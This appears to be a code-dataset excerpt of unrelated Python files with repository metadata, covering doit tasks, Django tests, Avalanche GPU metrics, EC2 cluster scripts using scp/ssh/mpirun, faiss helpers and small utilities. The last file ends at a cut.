| 33.397959 | 78 | 0.633364 | 432 | 3,273 | 4.74537 | 0.354167 | 0.061463 | 0.026341 | 0.038049 | 0.299512 | 0.245854 | 0.245854 | 0.245854 | 0.245854 | 0.150244 | 0 | 0.019478 | 0.215704 | 3,273 | 97 | 79 | 33.742268 | 0.77912 | 0.355943 | 0 | 0.339623 | 0 | 0 | 0.026466 | 0.014011 | 0 | 0 | 0 | 0 | 0.433962 | 1 | 0.113208 | false | 0.018868 | 0.037736 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4880ecda66e3c2c409be46833975599cd4502de6 | 641 | py | Python | doc/tutorial/getargs.py | OliverTED/doit | a6f75f312390aba352c3f00680cd32609323dbc2 | [
"MIT"
] | null | null | null | doc/tutorial/getargs.py | OliverTED/doit | a6f75f312390aba352c3f00680cd32609323dbc2 | [
"MIT"
] | 1 | 2018-10-02T19:28:08.000Z | 2018-10-02T19:28:08.000Z | doc/tutorial/getargs.py | smheidrich/doit | 1f9c3c755c96508ca2b1b2668f102f9d2da9c614 | [
"MIT"
] | null | null | null | DOIT_CONFIG = {'default_tasks': ['use_cmd', 'use_python']}
def task_compute():
def comp():
return {'x':5,'y':10, 'z': 20}
return {'actions': [(comp,)]}
def task_use_cmd():
return {'actions': ['echo x=%(x)s, z=%(z)s'],
'getargs': {'x': ('compute', 'x'),
'z': ('compute', 'z')},
'verbosity': 2,
}
def task_use_python():
return {'actions': [show_getargs],
'getargs': {'x': ('compute', 'x'),
'y': ('compute', 'z')},
'verbosity': 2,
}
def show_getargs(x, y):
print "this is x:%s" % x
print "this is y:%s" % y
| 24.653846 | 58 | 0.452418 | 79 | 641 | 3.531646 | 0.35443 | 0.075269 | 0.071685 | 0.114695 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.312012 | 641 | 25 | 59 | 25.64 | 0.61678 | 0 | 0 | 0.2 | 0 | 0 | 0.26053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4883b0040e8dc5ec47ef273298b6d359bf3bcacc | 2,409 | py | Python | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from rest_framework_simplejwt.state import User
from core.views import DeactivateSelfAPIView, BecomeCommercialAPIView
from tests.unittests.common import APIFactoryTestCase
class BecomeCommercialAPITestCase(APIFactoryTestCase):
def setUp(self) -> None:
super(BecomeCommercialAPITestCase, self).setUp()
self.view = BecomeCommercialAPIView.as_view()
self.user = User.objects.get(username='User')
self.user_2 = User.objects.get(username='User2')
self.user_3 = User.objects.get(username='User3')
self.commercial_user = User.objects.get(username='Commercial')
def test_BecomeCommercialValid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.get(username='User').is_commercial)
def test_BecomeCommercialInvalid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialUnauthenticated(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_BecomeCommercialNoData(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'))
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialAlreadyCommercial(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.commercial_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 42.263158 | 86 | 0.71565 | 264 | 2,409 | 6.329545 | 0.246212 | 0.09216 | 0.041891 | 0.065829 | 0.576302 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0 | 0.012214 | 0.184309 | 2,409 | 56 | 87 | 43.017857 | 0.838168 | 0 | 0 | 0.468085 | 0 | 0 | 0.094645 | 0.060191 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.12766 | false | 0.085106 | 0.12766 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6f8edf6b803563f114318f388210647b9924420a | 11,263 | py | Python | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-08-11T19:43:38.000Z | 2021-08-11T19:43:38.000Z | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-04-09T08:10:27.000Z | 2021-04-09T08:10:27.000Z | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric
from avalanche.evaluation.metric_results import MetricValue, MetricResult
from avalanche.evaluation.metric_utils import get_metric_name, \
phase_and_task, stream_type
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
"""
The standalone GPU usage metric.
Important: this metric approximates the real maximum GPU percentage
usage since it sample at discrete amount of time the GPU values.
Instances of this metric keeps the maximum GPU usage percentage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in mega-bytes.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the GPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
self.every = every
self.gpu_id = gpu_id
n_gpus = len(GPUtil.getGPUs())
if n_gpus == 0:
warnings.warn("Your system has no GPU!")
self.gpu_id = None
elif gpu_id < 0:
warnings.warn("GPU metric called with negative GPU id."
"GPU logging disabled")
self.gpu_id = None
else:
if gpu_id >= n_gpus:
warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
self.gpu_id = 0
self.thread = None
"""
Thread executing GPU monitoring code
"""
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max GPU usage.
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of GPU used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# GPU percentage
gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
if gpu_perc > self.max_usage:
self.max_usage = gpu_perc
time.sleep(self.every - ((time.monotonic() - start_time)
% self.every))
def start_thread(self):
if self.gpu_id:
assert not self.thread, "Trying to start thread " \
"without joining the previous."
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def result(self) -> Optional[float]:
"""
Returns the max GPU percentage value.
:return: The percentage GPU usage as a float value in range [0, 1].
"""
return self.max_usage
class MinibatchMaxGPU(PluginMetric[float]):
"""
The Minibatch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Minibatch Max GPU metric
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_iteration(self, strategy: 'BaseStrategy') -> None:
self.reset()
def after_training_iteration(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(PluginMetric[float]):
"""
The Epoch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the epoch Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_epoch(self, strategy) -> MetricResult:
self.reset()
def after_training_epoch(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(PluginMetric[float]):
"""
The Experience Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_eval_exp(self, strategy) -> MetricResult:
self.reset()
def after_eval_exp(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_eval(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy, add_experience=True)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(PluginMetric[float]):
"""
The Stream Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy) -> MetricResult:
self.reset()
self._gpu.start_thread()
def after_eval(self, strategy: 'BaseStrategy') \
-> MetricResult:
packed = self._package_result(strategy)
self._gpu.stop_thread()
return packed
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
phase_name, _ = phase_and_task(strategy)
stream = stream_type(strategy.experience)
metric_name = '{}/{}_phase/{}_stream' \
.format(str(self),
phase_name,
stream)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(gpu_id, every=0.5, minibatch=False, epoch=False,
experience=False, stream=False) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
:param minibatch: If True, will return a metric able to log the minibatch
max GPU usage.
:param epoch: If True, will return a metric able to log the epoch
max GPU usage.
:param experience: If True, will return a metric able to log the experience
max GPU usage.
:param stream: If True, will return a metric able to log the evaluation
max stream GPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxGPU(gpu_id, every))
if epoch:
metrics.append(EpochMaxGPU(gpu_id, every))
if experience:
metrics.append(ExperienceMaxGPU(gpu_id, every))
if stream:
metrics.append(StreamMaxGPU(gpu_id, every))
return metrics
__all__ = [
'MaxGPU',
'MinibatchMaxGPU',
'EpochMaxGPU',
'ExperienceMaxGPU',
'StreamMaxGPU',
'gpu_usage_metrics'
]
| 29.717678 | 80 | 0.589097 | 1,310 | 11,263 | 4.868702 | 0.166412 | 0.03371 | 0.026811 | 0.018344 | 0.520853 | 0.492945 | 0.4873 | 0.473816 | 0.473816 | 0.473816 | 0 | 0.004622 | 0.308444 | 11,263 | 378 | 81 | 29.796296 | 0.814225 | 0.27435 | 0 | 0.502762 | 0 | 0 | 0.078166 | 0.019713 | 0 | 0 | 0 | 0 | 0.005525 | 1 | 0.226519 | false | 0 | 0.049724 | 0.060773 | 0.403315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f93e22cf26c9a478c3691514ddab933b92e050e | 280 | py | Python | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | import numpy as np
import pickle
expert_file = 'maze_expert.npy'
imitation_agent_file = 'maze_agent.npy'
with open(imitation_agent_file, 'rb') as handle:
agent_data = pickle.load(handle)
with open(expert_file, 'rb') as handle:
expert_data = pickle.load(handle)
print("OK") | 31.111111 | 48 | 0.757143 | 44 | 280 | 4.590909 | 0.431818 | 0.09901 | 0.178218 | 0.138614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 280 | 9 | 49 | 31.111111 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0.124555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f985fc4f5c199385b03c83c5b2b06f32b9bac8b | 3,475 | py | Python | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | 20 | 2017-07-03T19:09:09.000Z | 2021-09-10T02:53:56.000Z | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | null | null | null | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | 9 | 2017-09-17T02:05:06.000Z | 2020-01-31T00:12:01.000Z | #!/usr/bin/env python
# Author: Omid Mashayekhi <omidm@stanford.edu>
import sys
import os
import subprocess
import config
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
import ec2
temp_file_name = '_temp_file_'
def copy_binary_file_to_hosts(ip_addresses):
for ip in ip_addresses:
command = ''
command += ' scp -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += config.SOURCE_PATH + 'Water '
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH
subprocess.call(command, shell=True)
def collect_logs(ip_addresses):
subprocess.call(['rm', '-rf', config.OUTPUT_PATH])
subprocess.call(['mkdir', '-p', config.OUTPUT_PATH])
for ip in ip_addresses:
subprocess.Popen(['scp', '-q', '-r', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip + ':' + config.FOLDER_PATH + 'mpi*.log',
config.OUTPUT_PATH])
subprocess.Popen(['scp', '-q', '-r', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip + ':' + config.FOLDER_PATH + '*_lb_log.txt',
config.OUTPUT_PATH])
def clean_logs(ip_addresses):
command = ''
command += 'rm -rf ' + config.FOLDER_PATH + 'mpi*.log' + ';'
command += 'rm -rf ' + config.FOLDER_PATH + '*_lb_log.txt' + ';'
for ip in ip_addresses:
subprocess.Popen(['ssh', '-q', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip, command])
def make_nodes_file_content(ip_addresses):
string = ""
for ip in ip_addresses:
print ip
string = string + ip + " cpu=8\n"
file = open(temp_file_name, 'w+')
file.write(string)
file.close()
def copy_nodes_file_to_hosts(ip_addresses):
make_nodes_file_content(ip_addresses)
for ip in ip_addresses:
command = ''
command += ' scp -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += temp_file_name
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH + config.NODES_FILE_NAME
subprocess.call(command, shell=True)
subprocess.call(['rm', temp_file_name])
def run_experiment(ip):
command = ''
command += ' ssh -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += ' ubuntu@' + ip
command += ' \"cd ' + config.REMOTE_PATH + '; '
command += ' mpirun -hostfile ' + config.NODES_FILE_NAME
command += ' -np ' + str(config.INSTANCE_NUM)
command += ' ./Water -scale ' + str(config.SCALE)
command += ' -e ' + str(config.FRAME_NUM) + '\" '
print command
subprocess.call(command, shell=True)
def collect_output_data(ip_addresses):
subprocess.call(['rm', '-rf', config.OUTPUT_NAME])
subprocess.call(['mkdir', '-p', config.OUTPUT_NAME])
process_num = 0
for ip in ip_addresses:
process_num += 1
command = ''
command += ' scp -r -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH + config.OUTPUT_NAME + str(process_num)
command += ' ' + config.OUTPUT_NAME
subprocess.call(command, shell=True)
| 26.937984 | 97 | 0.636835 | 427 | 3,475 | 4.985948 | 0.224824 | 0.067168 | 0.046031 | 0.055895 | 0.662752 | 0.616721 | 0.483326 | 0.394082 | 0.355566 | 0.355566 | 0 | 0.001436 | 0.198273 | 3,475 | 128 | 98 | 27.148438 | 0.762742 | 0.018705 | 0 | 0.416667 | 0 | 0 | 0.20558 | 0.106902 | 0.02381 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.059524 | null | null | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f9d6fb07fd37fbb906d2b22ed6f41821f271822 | 198 | py | Python | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | #To run the code, write
#from ishashad import ishashad
#then ishashad(number)
def ishashad(n):
if n % sum(map(int,str(n))) == 0:
print("True")
else:
print("False")
return | 18 | 37 | 0.60101 | 29 | 198 | 4.103448 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.252525 | 198 | 11 | 38 | 18 | 0.797297 | 0.363636 | 0 | 0 | 0 | 0 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa203b91e4061ab9a5aeb13af78a9c24d505f2c | 785 | py | Python | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 22 | 2019-01-13T12:56:56.000Z | 2020-11-03T01:39:20.000Z | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | null | null | null | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 5 | 2019-04-01T09:19:55.000Z | 2020-05-26T14:38:06.000Z | # -*- coding: utf-8 -*-
"""
File Name: faiss_utils
Description : faiss工具类
Author : mick.yi
date: 2019/1/4
"""
import faiss
import numpy as np
def get_index(dimension):
sub_index = faiss.IndexFlatL2(dimension)
index = faiss.IndexIDMap(sub_index)
return index
def update_multi(index, vectors, ids):
"""
:param index:
:param vectors:
:param ids:
:return:
备注:ValueError: array is not C-contiguous
"""
idx = np.argsort(ids)
# 先删除再添加
index.remove_ids(ids[idx])
index.add_with_ids(vectors[idx], ids[idx])
def update_one(index, vector, label_id):
vectors = np.expand_dims(vector, axis=0)
ids = np.array([label_id])
update_multi(index, vectors, ids)
| 21.216216 | 47 | 0.602548 | 100 | 785 | 4.6 | 0.54 | 0.034783 | 0.069565 | 0.1 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.277707 | 785 | 36 | 48 | 21.805556 | 0.795414 | 0.280255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa21afd208bf7323dcf7c8f05508069120736b0 | 475 | py | Python | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 1 | 2021-05-29T23:43:36.000Z | 2021-05-29T23:43:36.000Z | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | null | null | null | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 2 | 2021-06-01T01:36:01.000Z | 2021-06-01T01:36:59.000Z | class Relogio:
def __init__(self):
self.horas = 6
self.minutos = 0
self.dia = 1
def __str__(self):
return f"{self.horas:02d}:{self.minutos:02d} do dia {self.dia:02d}"
def avancaTempo(self, minutos):
self.minutos += minutos
while(self.minutos >= 60):
self.minutos -= 60
self.horas += 1
if self.horas >= 24:
self.horas = 0
self.dia +=1
| 23.75 | 75 | 0.492632 | 57 | 475 | 3.964912 | 0.368421 | 0.292035 | 0.070796 | 0.079646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062069 | 0.389474 | 475 | 19 | 76 | 25 | 0.717241 | 0 | 0 | 0 | 0 | 0.066667 | 0.120507 | 0.073996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.066667 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa2c35d5d796a2e58e703cd256e4f54f2acff9f | 432 | py | Python | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | null | null | null | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | 2 | 2021-06-08T20:56:16.000Z | 2021-09-08T01:41:42.000Z | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-10-28 21:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20191028_1802'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='registered_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='date_registered'),
),
]
| 22.736842 | 90 | 0.62963 | 48 | 432 | 5.479167 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096875 | 0.259259 | 432 | 18 | 91 | 24 | 0.725 | 0.104167 | 0 | 0 | 1 | 0 | 0.163636 | 0.05974 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa4cb77b9686bd974f4ba0799278420d18f452c | 1,928 | py | Python | fewshot/models/basic_model_VAT_ENT.py | AhmedAyad89/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 22 | 2019-03-13T02:19:17.000Z | 2021-08-06T03:13:00.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 1 | 2019-07-27T14:33:02.000Z | 2020-06-01T11:03:20.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 5 | 2019-03-07T06:18:51.000Z | 2019-10-22T05:33:23.000Z | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import tensorflow as tf
from fewshot.models.kmeans_utils import compute_logits
from fewshot.models.model import Model
from fewshot.models.refine_model import RefineModel
from fewshot.models.basic_model_VAT import BasicModelVAT
from fewshot.models.model_factory import RegisterModel
from fewshot.models.nnlib import (concat, weight_variable)
from fewshot.utils import logger
from fewshot.utils.debug import debug_identity
from fewshot.models.SSL_utils import *
l2_norm = lambda t: tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))
log = logger.get()
@RegisterModel("basic-VAT-ENT")
class BasicModelVAT_ENT(BasicModelVAT):
def get_train_op(self, logits, y_test):
